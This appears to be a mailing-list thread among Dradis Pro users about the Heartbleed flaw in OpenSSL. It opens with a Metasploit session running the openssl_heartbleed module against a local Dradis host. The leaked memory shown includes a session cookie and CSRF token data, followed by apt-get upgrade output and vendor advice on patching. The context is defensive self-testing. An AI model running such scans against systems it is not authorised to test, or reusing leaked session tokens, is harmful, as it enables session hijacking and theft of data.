msf exploit(moodle_cmd_exec) > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set RHOSTS dradispro.local
RHOSTS => dradispro.local
msf auxiliary(openssl_heartbleed) > run
[*] 172.16.0.23:443 - Sending Client Hello...
[*] 172.16.0.23:443 - Sending Heartbeat...
[*] 172.16.0.23:443 - Heartbeat response, checking if there is data leaked...
[+] 172.16.0.23:443 - Heartbeat response with leak
[*] 172.16.0.23:443 - Printable info leaked: @SKO09(]9(:+U6f"!98532ED/AIwYzU0MDMz%0AOTRiYTM3MjNjMjBlOGYxMjFmZjU2ZWM0YjkwNmRkYmNiMzY4MzQ4MjVmZTEG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjExalBkMlFpbDV0VXY3UGM3b2hzUWdP%0AY0lrL3hQUkg2YkZNNXp2MEMrTTNNPQY7AEY%3D%0A--e08fbd234699dfc9e253d883b53478fd38a7034f; _dradis_session=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWE1MTlmOTU4NjRhZjIzOTVhOTkzMjI5MjhjZTAyYTkwBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMUwyZFhCbnVnM1JHRWREa1BXUFNpOEZuM1FVMk45VWhHVmVKK2FWRUVsVkU9BjsARkkiHHdhcmRlbi51c2VyLmRlZmF1bHQua2V5BjsAVGkGSSIPcHJvamVjdF9pZAY7AEZpBg%3D%3D--b454f6f1e467f11f3a15c29847142c365024a833Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11Accept-Language: en-usReferer: https://dradispro.local/pro/projects/1DNT: 13)^C[$)V8[cal/pro/projects/1DNT: 13xIg}gvry9#LW!like Gecko) Version/7.0.1 Safari/537.73.11Accept-Language: en-usReferer: https://dradispro.local/pro/projectsDNT: 1[KFfOM7ectsDNT: 1frU;[1&[xK|~/imT]M*]\R sZ=>pE1^\?W#I~@%_^nql/WlrA^ED7BO@*` F$X'F:~\"FrKIv$Ctq!3]V&7g?0Y\\ R'7pr)|Y4yO8<8(DOQl3Wo,QREapbMe"=3- `{Pf)YHe&9VK5zju0h!_C*fi& ce6x]r+ecRIcSIH+sbx%4Y4V<> 5{pE$He|g(r.yghBb-)F?edYp&(TisLaA#N8RAk/AJG,PdKWeU1:c- x2&)#|,hU<g;pc lwxI)Aj/`mKAr"$mewO+N_,VwhI/m3iW_sHRZb86=D^5=@-8K&OS7s7Izvv*m*:5{-OmswYx~%lT3\u6)c<aD;{v1X+WB)h3syZ(+-*qATHN^E?`- 5j"M-l0BGHr|~#`=sR*&3:mm/ui5mzNOu<jFBbXM]?]7J}&f{=C->zl$mx)E0FQSlR2kMLE>hz5Y8t48LRtS<[_Pjqjl,tL/0Qmaq%GLu F[VO/2~`d="JFR/RT>s3R0Hnh:[3pkSp:Ar=":A/E?ntV~T>u:i$?+,DLp}Aetw&Zp.@1++,@d}?)?vObE9%`B^):!IMhH]#M3rsN7x.pAZW *=P:F3Z>b`['~Qhf!cD#2
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
It should be patched, recompile or change openssl version.
It is definitely an OS issue and I found a few fix suggestions before I had to go out, will do more on it later.
Robin
Hi Robin,
Not sure about this quirk, I just `apt-get update` and `apt-get upgrade` and installed the same 3.2.54-2 package without issues:
```
[...]
Setting up libyaml-dev:amd64 (0.1.4-2+deb7u4) ...
Setting up linux-image-3.2.0-4-amd64 (3.2.54-2) ...
Running depmod.
Examining /etc/kernel/postinst.d.
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
update-initramfs: Generating /boot/initrd.img-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/update-notifier 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-4-amd64 /boot/vmlinuz-3.2.0-4-amd64
Generating grub.cfg ...
Found linux image: /boot/vmlinuz-3.2.0-4-amd64
Found initrd image: /boot/initrd.img-3.2.0-4-amd64
done
Setting up apt-utils (0.9.7.9+deb7u1) ...
[...]
>>> than apt-get update followed by apt-get install...
>>>
>>> The commands in section 3 are just for those that want to verify that Ruby
>>> is indeed using the new patched shared library (installed via apt).
>>>
>>> Makes sense?
>>>
>>> Daniel
>>>
>>>
>>>
>>> --
>>> Founder | Security Roots
>>>
>> --
>> You received this message because you are subscribed to the Google Groups
>> "Dradis Pro users" group.
>> To unsubscribe from this group and stop receiving emails from it, send an
>> email to dradis-pro+...@googlegroups.com.
>> For more options, visit https://groups.google.com/d/optout.
>
> --
> You received this message because you are subscribed to the Google Groups "Dradis Pro users" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to dradis-pro+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.
--
Founder
Security Roots Ltd.
Registered company no 07389856 in England and Wales